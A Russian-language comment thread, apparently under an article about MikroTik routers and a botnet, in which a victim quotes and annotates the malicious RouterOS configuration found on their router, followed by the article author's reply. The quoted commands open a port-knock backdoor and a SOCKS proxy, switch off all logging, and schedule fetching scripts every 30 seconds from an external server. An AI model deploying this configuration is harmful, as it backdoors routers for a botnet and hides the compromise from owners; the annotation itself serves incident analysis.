P.S.S: Роутер был настроен по принципу запрещено всё, что явно не разрешено. Пользователь на роутере был один со сгенерированным паролем, что означает что доступ был получен не подбором пароля, а через уязвимость нулевого дня. Возможность была по моему мнению одна — через прокси сервис, который был включён по белому списку только разрешенным клиентам по адрес-листу, компьютер одного из которых я подозреваю был заражен. Процедура взлома здесь нетривиальная, и я считаю разработчика этой бот сети высококлассным специалистом. Однако, в статье ни малейших примеров или намёков о методе получении доступа, и какую дыру автор призывает закрывать.
#В этом разделе добавляются все локальные сети всех интерфейсов на микротике в список allow-ip
/ip firewall address-list
add address=192.168.1.0/24 list=allow-ip
#Здесь в файрволе выключаются все правила с action DROP и в начале вставляются пять правил. Я их пронумеровал и прокоментировал
# 1. action=Tarpit — создаёт соединение, но не разрешает его, держит в памяти, позволяет флудом на порт 30553 исчерпать оперативку роутера
# 2. Здесь, если злоумышленник постучится пакетом ICMP с размером пакета 1083 байта, вносит себя в список описанный в начале «allow-ip», и где тут «I closed the vulnerability with a firewall»
# 3. Разрешает ВСЁ всем кто в списке allow-ip
# 4. Закрывает возможность сделать буфер оверфлоу по UDP DNS кому то ещё. Злоумышленник не хочет делится добычей.
# 5. Блокируются некоторые порты TCP локальных сервисов роутера, злоумышленник опять не хочет делится добычей с другими злоумышлениками
/ip firewall filter
1.add action=tarpit chain=input comment=«Add you ip addess to allow-ip in Address Lists.» dst-port=30553 protocol=tcp
2.add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment=«I closed the vulnerability with a firewall.» packet-size=1083 protocol=icmp
3.add action=accept chain=input comment=«Please update RouterOS and change password.» src-address-list=allow-ip
4.add action=drop chain=input comment=" You can say thanks on the WebMoney Z399578297824" dst-port=53 protocol=udp
5.add action=drop chain=input comment=«or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1» dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp
#disabled all drop rules
# Ниже включается сервис socks, через который коммуницирует вся бот сеть. Около 10 000 роутеров ломится по этому порту ко мне до сих пор но с меньшей интенсивностью. Заметте, этот порт TCP 4145 не блочится файрволом.
/ip socks
set enabled=yes port=4145
# Выключается весь лог, чтобы владелец не узнал о произошедшем как можно дольше, и чтобы мониторинг ничего не сказал.
/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
# deleted all entries
# Тут нет никакого телеграмма или обратной связи, но адреса кошельков совпадают с теми что в статье.
/system note
set note=«I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1»
# Здесь скрипт и его шедулер для запуска каждые 30 секунд или сразу после ребута, скриптов, что подкладываются в файл mikrotik.php на сервере 95.154.216.164
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
P.S.: Вы пишите что вырвали из лап ботнета 100 000 устройств, но не приводите пример как именно это делаете. Вы приводите пример что защитили устройство пасхалкой, но эта пасхалка сама по себе зло, которое я описал выше, и появляется вместе со всем остальным кодом выше, что и есть бот сеть. В статье много нестыковок для того, кто столкнулся с проблемой лично. Вы либо плагиатите, поскольку адреса кошельков совпадают и вы утверждаете что они ваши, либо вы и есть злоумышленник, который притворяется что делает добро.
P.S.S: Роутер был настроен по принципу запрещено всё, что явно не разрешено. Пользователь на роутере был один со сгенерированным паролем, что означает что доступ был получен не подбором пароля, а через уязвимость нулевого дня. Возможность была по моему мнению одна — через прокси сервис, который был включён по белому списку только разрешенным клиентам по адрес-листу, компьютер одного из которых я подозреваю был заражен. Процедура взлома здесь нетривиальная, и я считаю разработчика этой бот сети высококлассным специалистом. Однако, в статье ни малейших примеров или намёков о методе получении доступа, и какую дыру автор призывает закрывать.
Статья 2018 года и последние действия в "чужих" микротиках были именно в тот период. С тех времён я утратил интерес к теме изучения мира микротиков.
Я делал только то, что описано в статье.
/ip socks set enabled=noТо есть сокет выключался.
Не надо мне приписывать чужие достижения...Если какой-то метод проникновения не описан в этой статье, то я его тогда и не обнаружил, а значит хакеры могли продолжать им пользоваться. Я не гений, чтобы знать всё...
С Ваших слов Вас взломали в августе, как я понимаю, 2022 года, то есть 4 года спустя... Вероятно, моя защита, вполне работала эти 4 года.
Почему Вы думаете, что за это время хакеры не смогли найти новую дырку в системе?Какую именно уязвимость я закрывал? Вы читали мою статью по диагонали... В самом начала стоит отсылка к моей предыдущей статье:
Ещё в мае 2018 я писал статью с рекомендациями как защитить свой Микротик.В ней уже была отсылка на первоисточник.Так же в моей версии, которую я раскатывал, была ссылка на официальный форум микротик с описанием уязвимости.
Sign up to leave a comment.
Для чего хакерам Микротик и как я спрятал 100 тыс. RouterOS от ботнета